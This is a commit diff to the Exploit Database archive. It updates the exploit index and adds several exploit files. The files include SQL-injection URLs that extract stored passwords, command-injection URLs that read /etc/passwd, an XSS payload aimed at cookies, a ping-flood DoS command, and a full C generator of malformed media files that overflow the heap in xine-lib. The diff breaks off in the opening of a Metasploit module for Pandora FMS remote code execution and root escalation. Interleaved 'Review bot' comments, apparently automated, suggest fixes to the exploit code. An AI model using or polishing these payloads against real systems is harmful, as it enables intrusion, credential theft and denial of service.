Updated 02_08_2014

Offensive Security 2014-02-08 04:27:41 +00:00
parent 9f14dc1cba
commit b702913b41
63 changed files with 1665 additions and 0 deletions


@ -28195,6 +28195,7 @@ id,file,description,date,author,platform,type,port
31382,platforms/php/webapps/31382.txt,"Joomla! and Mambo 'ensenanzas' Component 'id' Parameter SQL Injection Vulnerability",2008-03-11,The-0utl4w,php,webapps,0
31383,platforms/php/webapps/31383.txt,"PHP-Nuke NukeC30 3.0 Module 'id_catg' Parameter SQL Injection Vulnerability",2008-03-11,Houssamix,php,webapps,0
31384,platforms/php/webapps/31384.txt,"PHP-Nuke zClassifieds Module 'cat' Parameter SQL Injection Vulnerability",2008-03-11,Lovebug,php,webapps,0
31386,platforms/windows/local/31386.rb,"Adrenalin Player 2.2.5.3 (.m3u) - SEH Buffer Overflow ASLR+DEP Bypass",2014-02-04,"Muhamad Fadzil Ramli",windows,local,0
31387,platforms/php/webapps/31387.txt,"Uberghey CMS 0.3.1 'index.php' Multiple Local File Include Vulnerabilities",2008-03-12,muuratsalo,php,webapps,0
31388,platforms/php/webapps/31388.txt,"Travelsized CMS 0.4.1 'index.php' Multiple Local File Include Vulnerabilities",2008-03-12,muuratsalo,php,webapps,0
31389,platforms/php/webapps/31389.txt,"Chris LaPointe Download Center 1.2 login Action Multiple Parameter XSS",2008-03-12,ZoRLu,php,webapps,0
@ -28227,6 +28228,7 @@ id,file,description,date,author,platform,type,port
31419,platforms/php/webapps/31419.txt,"TopicsViewer 3.0 Beta 1 - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80
31420,platforms/php/webapps/31420.txt,"Eventy Online Scheduler 1.8 - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80
31421,platforms/php/webapps/31421.txt,"Booking Calendar - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80
31424,platforms/php/webapps/31424.txt,"Wordpress Dandelion Theme - Arbitry File Upload",2014-02-05,TheBlackMonster,php,webapps,80
31425,platforms/hardware/webapps/31425.txt,"D-Link DIR-100 - Multiple Vulnerabilities",2014-02-05,"Felix Richter",hardware,webapps,80
31426,platforms/php/webapps/31426.txt,"Plogger 1.0 (RC1) - Multiple Vulnerabilities",2014-02-05,killall-9,php,webapps,80
31427,platforms/php/webapps/31427.txt,"ownCloud 6.0.0a - Multiple Vulnerabilities",2014-02-05,absane,php,webapps,80
@ -28258,3 +28260,63 @@ id,file,description,date,author,platform,type,port
31455,platforms/php/webapps/31455.txt,"W-Agora 4.0 mail_users.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
31456,platforms/php/webapps/31456.txt,"W-Agora 4.0 moderate_notes.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
31457,platforms/php/webapps/31457.txt,"W-Agora 4.0 reorder_forums.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
31458,platforms/php/webapps/31458.txt,"PHP Webcam Video Conference - Multiple Vulnerabilities",2014-02-06,vinicius777,php,webapps,80
31459,platforms/php/webapps/31459.txt,"Joomla 3.2.1 - SQL Injection Vulnerability",2014-02-06,killall-9,php,webapps,80
31460,platforms/windows/local/31460.txt,"Asseco SEE iBank FX Client 2.0.9.3 - Local Privilege Escalation Vulnerability",2014-02-06,LiquidWorm,windows,local,0
31461,platforms/windows/dos/31461.txt,"Publish-It 3.6d - Buffer Overflow Vulnerability",2014-02-06,"Core Security",windows,dos,0
31462,platforms/linux/remote/31462.c,"xine-lib Multiple Heap Based Remote Buffer Overflow Vulnerabilities",2008-03-20,"Luigi Auriemma",linux,remote,0
31463,platforms/asp/webapps/31463.txt,"Iatek Knowledge Base 'content_by_cat.asp' SQL Injection Vulnerability",2008-03-20,xcorpitx,asp,webapps,0
31464,platforms/windows/dos/31464.pl,"SurgeMail 3.8 IMAP LSUB Command Remote Stack Buffer Overflow Vulnerability",2008-03-21,"Leon Juranic",windows,dos,0
31465,platforms/windows/remote/31465.cs,"DotNetNuke 4.8.1 Default 'ValidationKey' and 'DecriptionKey' Weak Encryption Vulnerability",2008-03-21,"Brian Holyfield",windows,remote,0
31466,platforms/cgi/webapps/31466.txt,"Webutil 2.3/2.7 'webutil.pl' Multiple Remote Command Execution Vulnerabilities",2008-03-21,"Zero X",cgi,webapps,0
31467,platforms/php/webapps/31467.txt,"phpMyChat 0.14.5 'setup.php3' Cross-Site Scripting Vulnerability",2008-03-22,ZoRLu,php,webapps,0
31468,platforms/php/webapps/31468.txt,"My Web Doc 2000 Administration Pages Multiple Authentication Bypass Vulnerabilities",2008-03-22,ZoRLu,php,webapps,0
31469,platforms/php/webapps/31469.txt,"ooComments 1.0 classes/class_admin.php PathToComment Parameter Remote File Inclusion",2008-03-22,ZoRLu,php,webapps,0
31470,platforms/php/webapps/31470.txt,"ooComments 1.0 classes/class_comments.php PathToComment Parameter Remote File Inclusion",2008-03-22,ZoRLu,php,webapps,0
31471,platforms/php/webapps/31471.txt,"TinyPortal 0.8.6/1.0.3 'index.php' Cross-Site Scripting Vulnerability",2008-03-22,Y433r,php,webapps,0
31472,platforms/php/webapps/31472.txt,"cPanel 11.18.3/11.21 'manpage.html' Cross-Site Scripting Vulnerability",2008-03-22,Linux_Drox,php,webapps,0
31473,platforms/osx/remote/31473.html,"Apple Safari 3.1 Window.setTimeout Variant Content Spoofing Vulnerability",2008-03-22,"Juan Pablo Lopez Yacubian",osx,remote,0
31474,platforms/windows/remote/31474.py,"Mitsubishi Electric GB-50A Multiple Remote Authentication Bypass Vulnerabilities",2008-03-22,"Chris Withers",windows,remote,0
31475,platforms/jsp/webapps/31475.txt,"Alkacon OpenCms 7.0.3 'users_list.jsp' Multiple Cross-Site Scripting Vulnerabilities",2008-03-24,nnposter,jsp,webapps,0
31476,platforms/php/webapps/31476.txt,"Efestech E-Kontor 'id' Parameter SQL Injection Vulnerability",2008-03-24,RMx,php,webapps,0
31477,platforms/multiple/dos/31477.txt,"snircd 1.3.4 And ircu 2.10.12.12 'set_user_mode' Remote Denial of Service Vulnerability",2008-03-24,"Chris Porter",multiple,dos,0
31478,platforms/hardware/dos/31478.txt,"Linksys SPA-2102 Phone Adapter Packet Handling Denial of Service Vulnerability",2008-03-24,sipherr,hardware,dos,0
31479,platforms/php/remote/31479.txt,"Quick Classifieds 1.0 index.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,remote,0
31480,platforms/php/webapps/31480.txt,"Quick Classifieds 1.0 locate.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31481,platforms/php/webapps/31481.txt,"Quick Classifieds 1.0 search_results.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31482,platforms/php/webapps/31482.txt,"Quick Classifieds 1.0 classifieds/index.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31483,platforms/php/webapps/31483.txt,"Quick Classifieds 1.0 classifieds/view.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31484,platforms/php/webapps/31484.txt,"Quick Classifieds 1.0 controlcenter/index.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31485,platforms/php/webapps/31485.txt,"Quick Classifieds 1.0 controlcenter/manager.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31486,platforms/php/webapps/31486.txt,"Quick Classifieds 1.0 controlcenter/pass.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31487,platforms/php/webapps/31487.txt,"Quick Classifieds 1.0 controlcenter/remember.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31488,platforms/php/webapps/31488.txt,"Quick Classifieds 1.0 controlcenter/sign-up.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31489,platforms/php/webapps/31489.txt,"Quick Classifieds 1.0 controlcenter/update.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31490,platforms/php/webapps/31490.txt,"Quick Classifieds 1.0 controlcenter/userSet.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31491,platforms/php/webapps/31491.txt,"Quick Classifieds 1.0 controlcenter/verify.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31492,platforms/php/webapps/31492.txt,"Quick Classifieds 1.0 controlpannel/alterCats.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31493,platforms/php/webapps/31493.txt,"Quick Classifieds 1.0 controlpannel/alterFeatured.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31494,platforms/php/webapps/31494.txt,"Quick Classifieds 1.0 controlpannel/alterHomepage.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31495,platforms/php/webapps/31495.txt,"Quick Classifieds 1.0 controlpannel/alterNews.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31496,platforms/php/webapps/31496.txt,"Quick Classifieds 1.0 controlpannel/alterTheme.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31497,platforms/php/webapps/31497.txt,"Quick Classifieds 1.0 controlpannel/color_help.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31498,platforms/php/webapps/31498.txt,"Quick Classifieds 1.0 controlpannel/createdb.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31499,platforms/php/webapps/31499.txt,"Quick Classifieds 1.0 controlpannel/createFeatured.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31500,platforms/php/webapps/31500.txt,"Quick Classifieds 1.0 controlpannel/createHomepage.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31501,platforms/php/webapps/31501.txt,"Quick Classifieds 1.0 controlpannel/createL.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31502,platforms/php/webapps/31502.txt,"Quick Classifieds 1.0 controlpannel/createM.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31503,platforms/php/webapps/31503.txt,"Quick Classifieds 1.0 controlpannel/createNews.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31504,platforms/php/webapps/31504.txt,"Quick Classifieds 1.0 controlpannel/createP.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31505,platforms/php/webapps/31505.txt,"Quick Classifieds 1.0 controlpannel/createS.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31506,platforms/php/webapps/31506.txt,"Quick Classifieds 1.0 controlpannel/createT.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31507,platforms/php/webapps/31507.txt,"Quick Classifieds 1.0 controlpannel/index.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31508,platforms/php/webapps/31508.txt,"Quick Classifieds 1.0 controlpannel/mailadmin.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31509,platforms/php/webapps/31509.txt,"Quick Classifieds 1.0 controlpannel/setUp.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31510,platforms/php/webapps/31510.txt,"Quick Classifieds 1.0 include/sendit.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31511,platforms/php/webapps/31511.txt,"Quick Classifieds 1.0 include/sendit2.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31512,platforms/php/webapps/31512.txt,"Quick Classifieds 1.0 include/adminHead.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31513,platforms/php/webapps/31513.txt,"Quick Classifieds 1.0 include/usersHead.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31514,platforms/php/webapps/31514.txt,"Quick Classifieds 1.0 style/default.scheme.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
31516,platforms/php/webapps/31516.txt,"Serendipity 1.7.5 (Backend) - Multiple Vulnerabilities",2014-02-07,"Stefan Schurtz",php,webapps,80
31517,platforms/php/webapps/31517.txt,"CTERA 3.2.29.0 and 3.2.42.0 - Stored XSS",2014-02-07,"Luigi Vezzoso",php,webapps,80
31518,platforms/linux/remote/31518.rb,"Pandora FMS Remote Code Execution",2014-02-07,metasploit,linux,remote,8023
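Review bot: The 31479 row is filed as `platforms/php/remote/31479.txt` with type `remote`, while the 31480–31514 rows for the same Quick Classifieds DOCUMENT_ROOT remote-file-inclusion family are all `platforms/php/webapps` with type `webapps`; the added file really does live under php/remote, so the inconsistency is in the classification rather than a typo in the row. If one advisory family is meant to be classified uniformly, the row should read `31479,platforms/php/webapps/31479.txt,"Quick Classifieds 1.0 index.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0` with the file moved to match. Two smaller metadata mismatches in the third hunk: the 31424 description repeats the submission's misspelling "Arbitry", and 31459 is credited to `killall-9` here while the added 31459.txt gives `# Exploit Author: kiall-9@mail.com`, so one of the two spellings should be checked against the submission.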



@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28376/info
Iatek Knowledge Base is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/content_by_cat.asp?contentid=99999999&catid=-99887766+UNION+SELECT+0,null,password,3,accesslevel,5,null,7,null,user_name+from+users
http://www.example.com/content_by_cat.asp?contentid=-99999999&catid=-99887766+union+select+0,null,password,3,accesslevel,5,null,7,8,user_name+from+users

11
platforms/cgi/webapps/31466.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/28393/info
Webutil is prone to multiple vulnerabilities that attackers can leverage to execute arbitrary commands. These issues occur because the application fails to adequately sanitize user-supplied input.
Successful attacks can compromise the affected application and possibly the underlying computer.
These issues affect Webutil 2.3 and 2.7.
http://www.example.com/cgi-bin/webutil.pl?details&|cat$IFS/etc/passwd
http://www.example.com/cgi-bin/webutil.pl?dig&|cat$IFS/etc/passwd
http://www.example.com/cgi-bin/webutil.pl?whois&|cat$IFS/etc/passwd


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28414/info
Linksys SPA-2102 Phone Adapter is prone to a denial-of-service vulnerability when handling multiple packets in quick succession.
Attackers can exploit this issue to deny access to the device's control center for legitimate users. Reports indicate that this issue is exploitable only via computers on the same LAN as the device.
Linksys SPA-2102 Phone Adapter running firmware 3.3.6 is vulnerable; other versions may also be affected.
ping -l 65500 192.168.0.1


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28411/info
Alkacon OpenCms is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
OpenCms 7.0.3 is vulnerable; other versions may also be affected.
http://www.example.com/opencms/system/workplace/admin/accounts/users_list.jsp?ispopup=&action=listsearch&framename=&title=&closelink=%252Fopencms%252Fopencms%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Faction%253Dinitial%2526path%253D%252Faccounts%252Forgunit&preactiondone=&dialogtype=&message=&resource=&listaction=&base=&selitems=&formname=lsu-form&sortcol=&oufqn=&originalparams=&page=&style=new&root=&path=%252Faccounts%252Forgunit%252Fusers&redirect=&searchfilter=%3C%2Fscript%3E%3Ciframe+onload%3Dalert%28document.cookie%29%3E%3Cscript%3E&listSearchFilter=%3C%2Fscript%3E%3Ciframe+onload%3Dalert%28document.cookie%29%3E%3Cscript%3E

375
platforms/linux/remote/31462.c Executable file

@ -0,0 +1,375 @@
source: http://www.securityfocus.com/bid/28370/info
The 'xine-lib' library is prone to multiple heap-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied input.
Attackers can exploit these issues to execute arbitrary code in the context of applications that use the library. Failed attacks will cause denial-of-service conditions.
These issues affect xine-lib 1.1.11; other versions may also be affected.
/*
by Luigi Auriemma
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
typedef uint8_t u8;
typedef uint16_t u16;
typedef uint32_t u32;
typedef int64_t i64;
typedef uint64_t u64;
#define VER "0.1"
#define BUFFSZ 0xffff
#define BE_FOURCC( ch0, ch1, ch2, ch3 ) \
( (uint32_t)(unsigned char)(ch3) | \
( (uint32_t)(unsigned char)(ch2) << 8 ) | \
( (uint32_t)(unsigned char)(ch1) << 16 ) | \
( (uint32_t)(unsigned char)(ch0) << 24 ) )
#define FLV_FLAG_HAS_VIDEO 0x01
#define FLV_FLAG_HAS_AUDIO 0x04
#define FLV_TAG_TYPE_SCRIPT 0x12
#define FLV_DATA_TYPE_NUMBER 0x00
#define FLV_DATA_TYPE_OBJECT 0x03
#define FLV_DATA_TYPE_ENDOBJECT 0x09
#define FLV_DATA_TYPE_ARRAY 0x0a
#define MOOV_ATOM BE_FOURCC('m', 'o', 'o', 'v')
#define RMRA_ATOM BE_FOURCC('r', 'm', 'r', 'a')
#define RDRF_ATOM BE_FOURCC('r', 'd', 'r', 'f')
#define RMF_TAG BE_FOURCC('.', 'R', 'M', 'F')
#define PROP_TAG BE_FOURCC('P', 'R', 'O', 'P')
#define MDPR_TAG BE_FOURCC('M', 'D', 'P', 'R')
#define DATA_TAG BE_FOURCC('D', 'A', 'T', 'A')
#define INDX_TAG BE_FOURCC('I', 'N', 'D', 'X')
#define VIDO_TAG BE_FOURCC('V', 'I', 'D', 'O')
#define DATA_CHUNK_HEADER_SIZE 10
#define FORM_TAG BE_FOURCC('F', 'O', 'R', 'M')
#define MOVE_TAG BE_FOURCC('M', 'O', 'V', 'E')
#define PC_TAG BE_FOURCC('_', 'P', 'C', '_')
#define PALT_TAG BE_FOURCC('P', 'A', 'L', 'T')
#define PALETTE_SIZE 256
#define PALETTE_CHUNK_SIZE (PALETTE_SIZE * 3)
#define EBML_ID_EBML 0x1A45DFA3
#define EBML_ID_DOCTYPE 0x4282
#define GST_EBML_SIZE_UNKNOWN 0x00ffffffffffffffULL
#define GST_EBML_ID_VOID 0xEC
#define FILM_TAG BE_FOURCC('F', 'I', 'L', 'M')
#define STAB_TAG BE_FOURCC('S', 'T', 'A', 'B')
int gst_ebml_write_element_id(u8 *data, u32 id); // from Gstreamer
int gst_ebml_write_element_size(u8 *data, i64 size); // from Gstreamer
int putcc(u8 *data, int chr, int len);
int putss(u8 *data, u8 *str);
int putxb(u8 *data, u64 num, int bits);
int putxi(u8 *data, u64 num, int bits);
void std_err(void);
int main(int argc, char *argv[]) {
FILE *fd;
int i,
attack;
u8 *buff,
*fname,
*psize,
*p;
setbuf(stdout, NULL);
fputs("\n"
"xine-lib <= 1.1.11 multiple heap overflows "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@autistici.org\n"
"web: aluigi.org\n"
"\n", stdout);
if(argc < 3) {
printf("\n"
"Usage: %s <attack> <output_file>\n"
"\n"
"Attacks:\n"
" 1 = heap overflow in demux_flv (file.FLV)\n"
" 2 = heap overflow in demux_qt (file.MOV)\n"
" 3 = heap overflow in demux_real (file.RM)\n"
" 4 = heap overflow in demux_wc3movie (file.MVE)\n"
" 5 = heap overflow in ebml.c (file.MKV)\n"
" 6 = heap overflow in demux_film.c (file.CAK)\n"
"\n", argv[0]);
exit(1);
}
attack = atoi(argv[1]);
fname = argv[2];
buff = malloc(BUFFSZ);
if(!buff) std_err();
p = buff;
if(attack == 1) {
p += putss(p, "FLV\x01");
*p++ = FLV_FLAG_HAS_VIDEO | FLV_FLAG_HAS_AUDIO;
p += putxb(p, 9, 32);
p += putxb(p, 0, 32);
p += putxb(p, FLV_TAG_TYPE_SCRIPT, 8); // tag_type
psize = p; p += 3;
p += putxb(p, 0, 32); // pts
p += putxb(p, 0, 24);
p += putxb(p, FLV_DATA_TYPE_OBJECT, 8);
p += putxb(p, 13, 16);
p += putss(p, "filepositions");
p += putxb(p, FLV_DATA_TYPE_ARRAY, 8);
p += putxb(p, 0x20000000, 32);
for(i = 0; i < 4000; i++) {
p += putxb(p, FLV_DATA_TYPE_NUMBER, 8);
p += putxb(p, 0x4141414141414141ULL, 64);
}
p += putxb(p, FLV_DATA_TYPE_ENDOBJECT, 8); // useless
putxb(psize, p - (psize + 3 + 4 + 3), 24);
} else if(attack == 2) {
p += putxb(p, 8000 - 24, 32);
p += putxb(p, MOOV_ATOM, 32);
p += putxb(p, 8000 - 16, 32);
p += putxb(p, RMRA_ATOM, 32);
p += putxb(p, 8000 - 8, 32);
p += putxb(p, RDRF_ATOM, 32);
p += putxb(p, 0, 32); // i + 4
p += putxb(p, 0, 32); // i + 8
p += putxb(p, 0xffffffff, 32); // i + 12
p += putcc(p, 'A', 8000 - 12);
} else if(attack == 3) {
p += putxb(p, RMF_TAG, 32);
p += putxb(p, 8, 32);
p += putxb(p, MDPR_TAG, 32);
psize = p; p += 4;
p += putxb(p, 0, 16);
p += putxb(p, 1, 16); // mdpr->stream_number
p += putxb(p, 0, 32); // mdpr->max_bit_rate
p += putxb(p, 0, 32); // mdpr->avg_bit_rate
p += putxb(p, 0, 32); // mdpr->max_packet_size
p += putxb(p, 0, 32); // mdpr->avg_packet_size
p += putxb(p, 0, 32); // mdpr->start_time
p += putxb(p, 0, 32); // mdpr->preroll
p += putxb(p, 0, 32); // mdpr->duration
p += putxb(p, 0, 8); // mdpr->stream_name_size
// mdpr->stream_name
p += putxb(p, 0, 8); //
mdpr->mime_type_size=data[33+mdpr->stream_name_size];
// mdpr->mime_type
p += putxb(p, 8, 32); // mdpr->type_specific_len
p += putxb(p, VIDO_TAG, 32); // mdpr->type_specific_data
p += putxb(p, VIDO_TAG, 32); // mdpr->type_specific_data
putxb(psize, (p - psize) + 4, 32);
p += putxb(p, PROP_TAG, 32);
psize = p; p += 4;
p += putxb(p, 0, 16);
p += putxb(p, 0, 32);
p += putxb(p, 1, 32); // avg_bitrate
p += putxb(p, 0, 32);
p += putxb(p, 0, 32);
p += putxb(p, 0, 32);
p += putxb(p, 0, 32); // this->duration
p += putxb(p, 0, 32);
p += putxb(p, (p - buff) + 8 + 8 + DATA_CHUNK_HEADER_SIZE, 32);
// this->index_start
p += putxb(p, 0, 32); // this->data_start
putxb(psize, (p - psize) + 4, 32);
p += putxb(p, DATA_TAG, 32);
psize = p; p += 4;
p += putxb(p, 0, 16);
p += putxb(p, 0, 32); //
this->current_data_chunk_packet_count
p += putxb(p, 0, 32); //
this->next_data_chunk_offset
p += putxb(p, INDX_TAG, 32);
p += putxb(p, 0, 32);
p += putxb(p, 0, 16);
p += putxb(p, 0x15555556, 32); // entries
p += putxb(p, 1, 16); // stream_num
p += putxb(p, 0, 32); // next_index_chunk
for(i = 0; i < 4000; i++) {
p += putxb(p, 0x41414141, 32);
p += putxb(p, 0x41414141, 32);
p += putxb(p, 0x41414141, 32);
}
putxb(psize, (p - psize) + 4, 32);
} else if(attack == 4) {
p += putxb(p, FORM_TAG, 32);
p += putxb(p, 0, 32);
p += putxb(p, MOVE_TAG, 32);
p += putxb(p, PC_TAG, 32);
p += putxb(p, 0, 32);
p += putxb(p, 0, 32);
p += putxb(p, 0, 32);
p += putxi(p, 0x555556, 32); // this->number_of_shots
p += putxb(p, 0, 32);
p += putxb(p, 0, 32);
p += putxb(p, 0, 32);
for(i = 0; i < 80; i++) {
p += putxb(p, PALT_TAG, 32);
p += putxb(p, PALETTE_CHUNK_SIZE, 32);
p += putcc(p, 13, PALETTE_CHUNK_SIZE); // -> 0x48
}
} else if(attack == 5) {
p += gst_ebml_write_element_id(p, EBML_ID_EBML);
p += gst_ebml_write_element_size(p, 8000); // not perfect
p += gst_ebml_write_element_id(p, EBML_ID_DOCTYPE);
p += gst_ebml_write_element_size(p, 0xffffffff);
p += putcc(p, 'A', 8000);
} else if(attack == 6) {
p += putss(p, "FILM");
p += 4;
p += putss(p, "1.09");
p += putxb(p, 0, 32);
p += putxb(p, STAB_TAG, 32);
psize = p; p += 4;
p += putxb(p, 44100, 32);
p += putxb(p, 0x71c71c8, 32); // sizeof(film_sample_t) is
36 bytes
for(i = 0; i < 3000; i++) {
p += putxb(p, 0x41414141, 32);
p += putxb(p, 0x41414141, 32);
p += putxb(p, 0x41414141, 32);
p += putxb(p, 0x41414141, 32);
}
putxb(psize, (p - psize) - 40, 32);
putxb(buff + 4, (p - psize) - 8 - 16, 32);
} else {
printf("\nError: wrong attack number (%d)\n", attack);
exit(1);
}
printf("- create file %s\n", fname);
fd = fopen(fname, "wb");
if(!fd) std_err();
printf("- write %u bytes\n", p - buff);
fwrite(buff, 1, p - buff, fd);
fclose(fd);
printf("- done\n");
return(0);
}
int gst_ebml_write_element_id(u8 *data, u32 id) { // from Gstreamer
int ret, bytes = 4, mask = 0x10;
while (!(id & (mask << ((bytes - 1) * 8))) && bytes > 0) {
mask <<= 1;
bytes--;
}
if (bytes == 0) {
bytes = 1;
id = GST_EBML_ID_VOID;
}
ret = bytes;
while (bytes--) {
data[bytes] = id & 0xff;
id >>= 8;
}
return(ret);
}
int gst_ebml_write_element_size(u8 *data, i64 size) { // from Gstreamer
int ret, bytes = 1, mask = 0x80;
if (size != GST_EBML_SIZE_UNKNOWN) {
while ((size >> ((bytes - 1) * 8)) >= (mask - 1) && bytes <= 8) {
mask >>= 1;
bytes++;
}
if (bytes > 8) {
mask = 0x01;
bytes = 8;
size = GST_EBML_SIZE_UNKNOWN;
}
} else {
mask = 0x01;
bytes = 8;
}
ret = bytes;
while (bytes-- > 0) {
data[bytes] = size & 0xff;
size >>= 8;
if (!bytes)
*data |= mask;
}
return(ret);
}
int putcc(u8 *data, int chr, int len) {
memset(data, chr, len);
return(len);
}
int putss(u8 *data, u8 *str) {
int len;
len = strlen(str);
memcpy(data, str, len);
return(len);
}
int putxb(u8 *data, u64 num, int bits) {
int i,
bytes;
bytes = bits >> 3;
for(i = 0; i < bytes; i++) {
data[i] = (num >> ((bytes - 1 - i) << 3)) & 0xff;
}
return(bytes);
}
int putxi(u8 *data, u64 num, int bits) {
int i,
bytes;
bytes = bits >> 3;
for(i = 0; i < bytes; i++) {
data[i] = (num >> (i << 3)) & 0xff;
}
return(bytes);
}
void std_err(void) {
perror("\nError");
exit(1);
}
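Review bot: In gst_ebml_write_element_id the loop condition `while (!(id & (mask << ((bytes - 1) * 8))) && bytes > 0)` evaluates the shift before the `bytes > 0` guard, so an id with none of the length-marker bits set reaches `mask << -8`, which is undefined behaviour; the operands should be swapped, `while (bytes > 0 && !(id & (mask << ((bytes - 1) * 8))))`. The two ids this program actually passes (EBML_ID_EBML and EBML_ID_DOCTYPE) leave the loop before that point, so the defect is latent here, but the helper is written as a reusable routine. Two portability issues in main: `printf("- write %u bytes\n", p - buff)` prints a ptrdiff_t with `%u` (use `%td`, or cast to `unsigned`), and `fname = argv[2]`, the string literals handed to putss, and `strlen(str)` inside putss all mix `char *` with the `u8 *` (unsigned char) typedef, which compilers warn about. The comment continuations that sit on their own lines after `p += putxb(p, 0, 8); //` and the two `p += putxb(p, 0, 32); //` lines in attack 3, and after the `sizeof(film_sample_t) is` comment in attack 6, look like rendering wraps; if they are really separate lines in the file they fall outside any comment and will not compile.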

113
platforms/linux/remote/31518.rb Executable file

@ -0,0 +1,113 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info={})
super(update_info(info,
'Name' => "Pandora FMS Remote Code Execution",
'Description' => %q{
This module exploits a vulnerability found in Pandora FMS 5.0RC1 and lower.
It will leverage an unauthenticated command injection in the Anyterm service on
port 8023. Commands are executed as the user "pandora". In Pandora FMS 4.1 and 5.0RC1
the user "artica" is not assigned a password by default, which makes it possible to su
to this user from the "pandora" user. The "artica" user has access to sudo without a
password, which makes it possible to escalate privileges to root. However, Pandora FMS 4.0
and lower force a password for the "artica" user during installation.
},
'License' => MSF_LICENSE,
'Author' =>
[
'xistence <xistence[at]0x90.nl>' # Vulnerability discovery and Metasploit module
],
'References' =>
[
],
'Payload' =>
{
'BadChars' => "",
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl python',
}
},
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' =>
[
['Pandora 5.0RC1', {}]
],
'Privileged' => true,
'DisclosureDate' => "Jan 29 2014",
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8023),
